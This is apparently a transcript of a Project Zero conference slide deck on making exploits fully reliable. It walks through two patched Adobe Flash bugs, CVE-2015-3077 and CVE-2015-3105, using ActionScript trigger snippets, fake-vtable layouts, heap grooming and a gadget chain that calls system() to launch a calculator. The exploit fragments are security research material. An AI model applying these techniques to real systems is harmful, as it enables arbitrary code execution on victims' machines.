i am the 100% [*] by chris evans & natalie silvanovich
TRANSCRIPT
![Page 1: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/1.jpg)
I am the 100% [*][*] Terms and conditions apply
@natashenka, @scarybeasts -- Project Zero
![Page 2: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/2.jpg)
Who / whaaaaat?● Chris Evans / scarybeasts / Troublemaker● Natalie Silvanovich / natashenka / Security Engineer
![Page 3: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/3.jpg)
What is reliability?❏ Does the exploit always execute code?❏ Is the exploit cross-platform and cross-version?❏ Does the exploit work under EMET, CFG?❏ Does execution continue cleanly post-exploitation?❏ Does the exploit take a long time or use a lot of memory?❏ If it fails, what happens
![Page 4: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/4.jpg)
[*] Terms and conditions applyThe 100% reliable exploits presented:
Are guaranteed[*] to succeed against a specific version and environment, because they comprise a series of deterministic and fully understood steps;
*Provide adequate control that at a minimum, all the discussed sources of unreliability can be detected and lead to aborts, not crashes.
![Page 5: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/5.jpg)
“Some bugs are born reliable, some achieve reliability and some have
reliability thrust upon them”
Reliability vs. bug class
![Page 6: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/6.jpg)
Reliability vs. bug class➔ Do not want
◆ Inter-chunk heap buffer overflow
➔ Maybe◆ Use-after-free
➔ Want◆ Intra-chunk heap buffer overflow◆ Stack corruption◆ Type confusion
![Page 7: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/7.jpg)
Case study #1: Flash filters type confusion➢ CVE-2015-3077, patched May 12, 2015➢ Ideal bug for reliability
![Page 8: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/8.jpg)
CVE-2015-3077var filter = new flash.filters.BlurFilter();object.filters = [filter];
var e = flash.filters.ConvolutionFilter; flash["filters"] = [];
flash["filters"]["BlurFilter"] = e; var f = object.filters; var d = f[0];
![Page 9: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/9.jpg)
CVE-2015-3077 var filter = new flash.filters.BlurFilter();
object.filters = [filter];flash.filters.BlurFilter =
flash.filters.ConvolutionFilter; var f = object.filters; var d = f[0]
![Page 10: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/10.jpg)
CVE-2015-3077BevelFilter
<super>
int hcolor
int scolor
float blurX
float blurY
int quality
...
ConvolutionFilter
<super>
int matX
int matY
float* matrix
int quality
...
DisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
ColorMatrixFilter
<super>
float color[0]
float color[1]
float color[2]
float color[3]
float color[4]
...
GlowFilter
<super>
int color
<internal>
float blurX
float blurY
int quality
...
(and others)
32 bits
![Page 11: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/11.jpg)
I want a vtable...
BitmapData
_vtable
...
void* bits
...
BevelFilter
<super>
int hcolor
int scolor
float blurX
float blurY
int quality
...
DisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
![Page 12: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/12.jpg)
I want a vtable...
BitmapData
_vtable
...
void* bits
...
BevelFilter
<super>
int hcolor
int scolor
float blurX
float blurY
int quality
...
DisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
![Page 13: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/13.jpg)
I want a vtable...
BitmapData
_vtable
...
void* bits
...
BevelFilter
<super>
int hcolor
int scolor
float blurX
float blurY
int quality
...
DisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
= var low
= var high
var d1 = FilterConfuse.confuse("DisplacementMapFilter", "BevelFilter", dis, new_mc);var low = FloatConverter.fromColor(d1.highlightAlpha, d1.highlightColor);var high = FloatConverter.fromColor(d1.shadowAlpha, d1.shadowColor);
![Page 14: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/14.jpg)
I want a vtable...
DisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
ConvolutionFilter
<super>
int matX
int matY
float* matrix
int quality
...
![Page 15: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/15.jpg)
I want a vtable...
DisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
ConvolutionFilter
<super>
int matX
int matY
float* matrix
int quality
...
Set to var low
Set to var high
var f = new DisplacementMapFilter();f.mapPoint = {bottom, top}
![Page 16: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/16.jpg)
I want a vtable...DisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
ConvolutionFilter
<super>
int matX
int matY
float* matrix
int quality
...
var vtable_low = f.matrix[0];var vtable_high = f.matrix[1];
![Page 17: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/17.jpg)
But … floats● Returning a pointer as
a float is problematic
Sign Exponent Fraction Value
0 00⋯00 00⋯00 +0
0 00⋯00 00⋯0111⋯11
Pos Denormalized Real0.f × 2(-b+1)
0 00⋯0111⋯10
XX⋯XX Positive Normalized Real1.f × 2(e-b)
0 11⋯11 00⋯00 +Infinity
0 11⋯11 00⋯0101⋯11
SNaN
0 11⋯11 10⋯0011⋯11
QNaN
1 00⋯00 00⋯00 -0
1 00⋯00 00⋯0111⋯11
Neg Denormalized Real-0.f × 2(-b+1)
1 00⋯0111⋯10
XX⋯XX Neg Normalized Real-1.f × 2(e-b)
1 11⋯11 00⋯00 -Infinity
1 11⋯11 00⋯0101⋯11
SNaN
1 11⋯11 10⋯0011.11
QNaN
float* f = new float();*((int*)f) = 0x7fffffff;f--;if(*((int*)f) == 0x7fffffff){ ...
![Page 18: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/18.jpg)
Options● Write a float converter
○ Requires cast to int (not supported in AS)
● Use type confusion
● Never perform math on a float
void* ptr = something;float f = (float) ptr;int i = (int) f;
f++; // badi++; // okay
![Page 19: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/19.jpg)
Type Confusion ConverterColorMatrix
Filter
<super>
float color[0]
float color[1]
float color[2]
float color[3]
float color[4]
...
GlowFilter
<super>
int color
<internal>
float blurX
float blurY
int quality
...
ftoi itof
![Page 20: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/20.jpg)
Type Confusion ConverterColorMatrix
Filter
<super>
float color[0]
float color[1]
float color[2]
float color[3]
float color[4]
...
GlowFilter
<super>
int color
<internal>
float blurX
float blurY
int quality
...
ftoi itof
![Page 21: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/21.jpg)
Type Confusion Converter❖ Fetching ColorMatrixFilter color array copies entire array, even elements not being
accessed❖ For a confused filter, this extends over the heap❖ Elements are converted to numbers based on type, sometimes involving
dereferencing a pointer❖ Leads to spurious crashes based on what’s on the heap after the filter❖ itof only (ftoi still works, as ColorMatrixFilter is allocated by function)
![Page 22: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/22.jpg)
Let’s try again ...Convolution
Filter
<super>
...
int quality
float divisor
...
DisplacementMapFilter
<super>
...
int componentX
int componentY
...
itof
![Page 23: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/23.jpg)
New Converter★ No heap issues★ But …
sub $0x8,%espmovl $0xffb6c710,0x8(%esp)flds 0x8(%esp)fstpl 0x8(%esp)fldl 0x8(%esp)fstps 0x8(%esp)mov 0x8(%esp),%eax
★ Conversion from double to float corrects SNANs to QNANs★ Fails 1/512 of the time, but is detectable
0xfff6c710!!!
![Page 24: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/24.jpg)
Moving IPDisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
ConvolutionFilter
<super>
int matX
int matY
float* matrix
int quality
...
float[0]
float[1]
...
Fake vtable,defined in ActionScript
f.matrix = [0xaa, 0xbb]
![Page 25: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/25.jpg)
Moving IPDisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
ConvolutionFilter
<super>
int matX
int matY
float* matrix
int quality
...
float[0]
float[1]
...
Fake vtable,defined in ActionScript
f.matrix = [0xaa, 0xbb]
![Page 26: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/26.jpg)
Moving IPDisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
ConvolutionFilter
<super>
int matX
int matY
float* matrix
int quality
...
float[0]
float[1]
...
Fake vtable,defined in ActionScript
f.matrix = [0xaa, 0xbb]
= var fvh
= var fvl
![Page 27: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/27.jpg)
Moving IP
DisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
ConvolutionFilter
<super>
int matX
int matY
float* matrix
int quality
...
float[0]
float[1]
...
Fake Bitmap bits,defined in
ActionScript,points to vtablef.matrix = [vtl, vth]
float[0]
float[1]
...
Fake vtable
f.matrix = [0xaa, 0xbb]
![Page 28: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/28.jpg)
Moving IP
DisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
ConvolutionFilter
<super>
int matX
int matY
float* matrix
int quality
...
float[0]
float[1]
...
Fake Bitmap bits,defined in
ActionScript,points to vtablef.matrix = [vtl, vth]
float[0]
float[1]
...
Fake vtable
f.matrix = [0xaa, 0xbb]
![Page 29: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/29.jpg)
Moving IP
DisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
ConvolutionFilter
<super>
int matX
int matY
float* matrix
int quality
...
float[0]
float[1]
...
Fake Bitmap bits,defined in
ActionScript,points to vtablef.matrix = [vtl, vth]
float[0]
float[1]
...
Fake vtable
f.matrix = [0xaa, 0xbb]
= var fbtlow
= var fbthigh
![Page 30: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/30.jpg)
Moving IPConvolution
Filter
<super>
int matX
int matY
float* matrix
int quality
...
float[0]
float[1]
...
Fake Bitmap,defined in AS
f.matrix = [..., fbtlow, fbthigh, ...]
(at correctoffset)
DisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
float[0]
float[1]
...
Fake Bitmap bits Fake vtable
float[0]
float[1]
...
![Page 31: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/31.jpg)
Moving IPConvolution
Filter
<super>
int matX
int matY
float* matrix
int quality
...
float[0]
float[1]
...
Fake Bitmap,defined in AS
f.matrix = [..., fbtlow, fbthigh, ...]
(at correctoffset)
DisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
float[0]
float[1]
...
Fake Bitmap bits Fake vtable
float[0]
float[1]
...
![Page 32: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/32.jpg)
Moving IPConvolution
Filter
<super>
int matX
int matY
float* matrix
int quality
...
float[0]
float[1]
...
Fake Bitmap,defined in AS
f.matrix = [..., fbtlow, fbthigh, ...]
(at correctoffset)
DisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
= var fblo
= var fbhi
float[0]
float[1]
...
Fake Bitmap bits Fake vtable
float[0]
float[1]
...
![Page 33: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/33.jpg)
Almost thereDisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
BevelFilter
<super>
int hcolor
int scolor
float blurX
float blurY
int passes
...
![Page 34: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/34.jpg)
Almost thereDisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
BevelFilter
<super>
int hcolor
int scolor
float blurX
float blurY
int passes
...
var fbhi
var fblo
![Page 35: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/35.jpg)
Almost thereDisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
BevelFilter
<super>
int hcolor
int scolor
float blurX
float blurY
int passes
...
var fbhi
var fblo
Fake Bitmap bits
float[0]
float[1]
...
Fake Bitmap
float[0]
float[1]
...
Fake vtable
float[0]
float[1]
...
![Page 36: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/36.jpg)
Almost thereDisplacementMapFilter
<super>
BitmapData*bitmap
int p_x
int p_y
<internal>
...
BevelFilter
<super>
int hcolor
int scolor
float blurX
float blurY
int passes
...
var fbhi
var fblo
Fake Bitmap bits
float[0]
float[1]
...
Fake Bitmap
float[0]
float[1]
...
Fake vtable
float[0]
float[1]
...
var b = dmfilter.mapImage; b.setPixel32(0, 0, 5);
![Page 37: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/37.jpg)
What’s in the fake vtable?Fake vtable
“gedit”
...
0x20: void* system
0x28: void* gadget1
...
0x40: void* gadget2
...
mov rdi, raxcall [rax + 0x40]
call [rax + 0x20] add rsp, 8 ret
virtual call lands herecall [rax + 0x28]
![Page 38: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/38.jpg)
Sources of Reliability● High quality bug
○ Object members line up○ Object members are mutable
● Type confused objects are lightly used○ Bypass by running filters on 0x0 MovieClip
![Page 39: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/39.jpg)
Sources of (Un)Reliability● Float conversion
○ 99.9 % of the time, it works every time
● GC○ Never let go …○ Can’t survive Player destruction without code fixups
![Page 40: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/40.jpg)
Can it reach 100% reliable?● Use a different buffer
○ Floats are the problem, but not every buffer uses them○ Have a pointer to the player
● Use different COP gadgets○ They can’t all have pointers that are SNANs
● Find an integer overwrite
![Page 41: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/41.jpg)
Demo
![Page 42: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/42.jpg)
Case study #2: Flash shader bad write
Shader: compiled program (len = 12)
ShaderParameter(position: 10)
![Page 43: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/43.jpg)
Case study #2: Flash shader bad write
Shader: compiled program (len = 12)
ShaderParameter(position: 10)
Shader: compiled program (len = 20)
ShaderParameter(position: 18)
![Page 44: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/44.jpg)
Case study #2: Flash shader bad writeCVE-2015-3105, patched June 9, 2015
Shader: compiled program (len = 12)
Shader: compiled program (len = 20)
ShaderParameter(position: 18)
Corruption
![Page 45: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/45.jpg)
Case study #2: Flash shader bad writeCVE-2015-3105, patched June 9, 2015
Shader: compiled program (len = 12)
Shader: compiled program (len = 20)
ShaderParameter(position: 18)
Vector.<uint> length
![Page 46: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/46.jpg)
But is it reliable?
![Page 47: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/47.jpg)
But is it reliable?SURELY THOU JESTETH
THOU HAST CROSSED A HEAP CHUNK
![Page 48: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/48.jpg)
Case study #2: Let’s do betterCVE-2015-3105
Shader: compiled program
ShaderParameter(position: 10)
| op | op | op
![Page 49: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/49.jpg)
Case study #2: Let’s do betterCVE-2015-3105
Shader: compiled program
ShaderParameter(position: 8)
| op | op | op
op | arg1 | arg2 | arg3 | arg4 Ternary opcode
![Page 50: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/50.jpg)
Case study #2: The story so far● We performed an intra-chunk out-of-bounds write (deterministic).● We have exactly one useful side-effect to carry forward.● We corrupted the 4th argument to a ternary opcode:
DEST_REG = (CONDITION_REG == 1) ? SRC_REG_1 : SRC_REG_2
● We can reference an out-of-bounds register number.● We turned an out-of-bounds write into… an out-of-bounds read!● Uh, yay us?
![Page 51: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/51.jpg)
Case study #2: The out-of-bounds read(Frankenstein’s) Runtime shader object, single heap chunk
Registers (5) C++ object
Read: e.g. register 1000
![Page 52: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/52.jpg)
Case study #2: The out-of-bounds read(Frankenstein’s) Runtime shader object, single heap chunk
Registers (5) C++ object: vtable texture self
Read: e.g. register 6, 20, 30
![Page 53: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/53.jpg)
Case study #2: Are we getting somewhere?● We performed an intra-chunk out-of-bounds write (deterministic).● This enables an out-of-bounds read.● We performed various intra-chunk out-of-bounds reads (deterministic).● We leaked the value of a vtable and a buffer (ROP-tastic!).● But… you can’t take over a process with a read.
○ (Unless you’re James Forshaw)
● We also have inter-chunk out-of-bounds reads and writes, but they obviously have reliability problems.
● Can we put these pieces all together?
![Page 54: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/54.jpg)
Case study #2: Breakthrough #1!We know our own address
So we know if it is safe to read out-of-bounds
![Page 55: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/55.jpg)
Case study #2: Breakthrough #2!We can read out-of-bounds safely
To do a precision out-of-bounds write
![Page 56: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/56.jpg)
Case study #2: Chaining the primitivesHeap spray to this attempted state:
8KB chunks
![Page 57: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/57.jpg)
Case study #2: Chaining the primitivesPunch a hole, run shader:
Read:self
8KB chunks 0x7f1234567000
![Page 58: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/58.jpg)
Case study #2: Chaining the primitivesAllocate heap groom object, punch a hole, run shader:
Read:self, oob 3D object
8KB chunks 0x7f1234565000
![Page 59: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/59.jpg)
Case study #2: Chaining the primitivesAllocate heap groom object, punch a hole, run shader (x2):
Read:self, oob
Vector.<uint>
Vector.<uint> 3D object
8KB chunks 0x7f1234561000
![Page 60: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/60.jpg)
Case study #2: Chaining the primitivesAllocate heap groom object, punch a hole, run shader, prove final layout:
Read:self, oob
Shaderprogram
Vector.<uint>
Vector.<uint> 3D object
8KB chunks 0x7f1234561000
![Page 61: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/61.jpg)
Demo
<o’reilly>**** it, we’re doing it live!</o’reilly>
![Page 62: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/62.jpg)
Case study #2: COP● Shall we ROP, JOP or COP?● COP FTW!
mov rdi, raxcall [rax + 0x50]
● COP advantages○ No stack pivot (tricky gadget on 64-bit, detectability)○ Common instruction sequence○ Stack is always valid○ Easy continuation of execution
![Page 63: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/63.jpg)
Case study #2: COP vtable setupVector.<uint> buffer contents:
gnome-calculator 0x20 0x50 0x70
Gadget #3 Gadget #2 Gadget #1
rax
![Page 64: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/64.jpg)
Case study #2: COP vtable trigger pullVector.<uint> buffer contents:
gnome-calculator 0x20 0x50 0x70
// Fire the exploit. This calls our vtable on the 3D object, with this // initial instruction and following gadget sequence: call [rax + 0x70] ; rax points to our Vector.<uint> buffer. mov rdi, rax ; gadget 1 starts, sets up system() param. call [rax + 0x50]
rax, rdi
![Page 65: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/65.jpg)
Case study #2: COP vtable trigger pullVector.<uint> buffer contents:
gnome-calculator 0x20 0x50 0x70
// Fire the exploit. This calls our vtable on the 3D object, with this // initial instruction and following gadget sequence: call [rax + 0x70] ; rax points to our Vector.<uint> buffer. mov rdi, rax ; gadget 1 starts, sets up system() param. call [rax + 0x50] call [rax + 0x20] ; gadget 2 starts
rax, rdi
![Page 66: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/66.jpg)
Case study #2: COP vtable trigger pullVector.<uint> buffer contents:
gnome-calculator 0x20 0x50 0x70
// Fire the exploit. This calls our vtable on the 3D object, with this // initial instruction and following gadget sequence: call [rax + 0x70] ; rax points to our Vector.<uint> buffer. mov rdi, rax ; gadget 1 starts, sets up system() param. call [rax + 0x50] call [rax + 0x20] ; gadget 2 starts jmp system@plt ; gadget 3 add rsp, 8 ; gadget 2 resumes, re-aligns stack ret ; return back to original call _context3d.driverInfo;
rax, rdi
![Page 67: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/67.jpg)
Case study #2: mopping up● Continuation of execution, please!
○ Repair trashed vtable using the same Vector.<uint> out-of-bounds write.○ Repair trashed Vector.<uint> length by re-running shader program with “correct” parameter value.
![Page 68: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/68.jpg)
Case study #2: TL;DR● Intra-chunk out-of-bounds write to corrupt ternary opcode.● Intra-chunk out-of-bounds read to grab vtable, self heap address.● Inter-chunk out-of-bounds read (safe), using self heap address knowledge.● Inter-chunk out-of-bounds read (safe, multiple) to prove heap layout and heap groom
success.● Inter-chunk out-of-bounds write to clobber known object field.● Read / write vtable just after Vector.<uint>● Bit of COP; repair damage.● Time for cigars.
![Page 69: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/69.jpg)
But is it reliable?
![Page 70: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/70.jpg)
But is it reliable?COMPUTERS!
THEY’RE HARD
![Page 71: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/71.jpg)
Case study #2: sources of unreliability● What about threads?
○ Sort of OK. If a thread messes with our heap groom, we’ll detect and exit. We do not believe that a thread will touch our corrupted 3D object during its windows of corruption.
● What about page reload?○ OK. Page reload touches every object to shut down / delete it, but page reload is synchronous with
respect to running script.
● What about out-of-memory pressure?○ OK. Out-of-memory pressure decommits pages in the heap, which could lead to a fault reading out-of-
bounds. But we can query system state in our ActionScript. And race window is tiny.
● What about unusual virtual address space layout?○ Iffy. Due to shader language constraints, we can only compare lower 32-bits of a pointer. Trouble if
the heap spans > 4GB. (This does not occur in normal Flash processes.)
![Page 72: I am the 100% [*] by Chris Evans & Natalie Silvanovich](https://reader030.vdocuments.net/reader030/viewer/2022032700/55d1fc9bbb61ebf6528b4748/html5/thumbnails/72.jpg)
